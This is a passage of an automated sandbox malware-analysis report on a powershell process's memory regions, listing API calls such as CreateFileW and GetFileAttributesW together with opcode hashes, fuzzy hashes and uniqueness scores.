                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 0 7a6bda8-7a6bddb call 7a6b65c 4 7a6be06-7a6be9c 0->4 5 7a6bddd-7a6be05 0->5 14 7a6bea4-7a6bedf CreateFileW 4->14 15 7a6be9e-7a6bea1 4->15 16 7a6bee1-7a6bee7 14->16 17 7a6bee8-7a6bf05 14->17 15->14 16->17
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 117 7a6be48-7a6be9c 120 7a6bea4-7a6bedf CreateFileW 117->120 121 7a6be9e-7a6bea1 117->121 122 7a6bee1-7a6bee7 120->122 123 7a6bee8-7a6bf05 120->123 121->120 122->123
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07A6BDC7,00000000,00000000,00000003,00000000,00000002), ref: 07A6BED2
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 126 7a6b65c-7a6be9c 129 7a6bea4-7a6bedf CreateFileW 126->129 130 7a6be9e-7a6bea1 126->130 131 7a6bee1-7a6bee7 129->131 132 7a6bee8-7a6bf05 129->132 130->129 131->132
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07A6BDC7,00000000,00000000,00000003,00000000,00000002), ref: 07A6BED2
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

[Control-flow graph: figure not preserved]
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 07A60328
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

[Control-flow graph: figure not preserved]
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 07A60328
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

[Control-flow graph: figure not preserved]
                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: dl4l
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-736318344
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

[Control-flow graph: figure not preserved]
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: beb32c4f53e49ce8232d5aa62d4402dac27b8888c47deac35ac22bb620952b8e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: bc055031eded40316f8244e04448bc398ec968ae0eeec2464d0e81cd4bf53994
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: beb32c4f53e49ce8232d5aa62d4402dac27b8888c47deac35ac22bb620952b8e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1981AC347006018FC708DF38D544A6EBBE2EF88358B1185A8E50ACB7A4DF75EC46CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 183621728104f55e9f0abb85db7f9f17ba9662321c38eb8b6454fda0058a5c4e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6fbebca2d969c4ae119c4f896384a890f2b309ffc709159aea2cd785fc9e2fc7
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 183621728104f55e9f0abb85db7f9f17ba9662321c38eb8b6454fda0058a5c4e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD41D1747046118BEB189B30E4A03BE7BA7EFC4349F144579D9068B794DF7AAD46CB80
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 966b12d0a2dfa5232fed00c35c5b9411042c2be53c73ba537a1a950591c1330c
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 868b013ca4dd3ed402cf2d7090db69761b77a18a038cbd55dba76a9ecd49b13a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 966b12d0a2dfa5232fed00c35c5b9411042c2be53c73ba537a1a950591c1330c
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35213631608A149FD724DB28C8407AA7BE5EF8134CF018968D149DB699DBF5BD0987A0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5ff256358fc5c8080115cf76baf1abd7252700019dac0f21b7330cfabb747eaf
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8d8f8247561b748e8d8304b3b23edb2607c89eadb5e6fbafd688b8222d0d013e
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ff256358fc5c8080115cf76baf1abd7252700019dac0f21b7330cfabb747eaf
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A821B4718086448FDF14CF58D8806DDBBF4FF89328F14865ED008AB26AC775A946CBE1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 20a38c333513e0817f5cbd897603ebdcd5d0fcc6b985ca158706c3cfaa860a55
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f98fe4ced0c4aa87e55c32871d1df14945cde7e55a1c8c44e93e7bbe6ecf577a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20a38c333513e0817f5cbd897603ebdcd5d0fcc6b985ca158706c3cfaa860a55
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC2133B1C012188FDB40CFA9D884BDEFBF4FF88314F14812AE808AB244D774A904CBA1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2d37c2241e6ce134140e9457ec6f37d9a66760e8e409c79b14b11031c94099eb
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2f868f12fac27639029fa39d35459afe7d882a9adb3a49f211d3fd657ce81b3b
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d37c2241e6ce134140e9457ec6f37d9a66760e8e409c79b14b11031c94099eb
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B11897250C3804FCB168B28D8513D6BFE0DF82316F0C84FADD888F196D2389914C7A6
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
Uniqueness

Uniqueness Score: -1.00%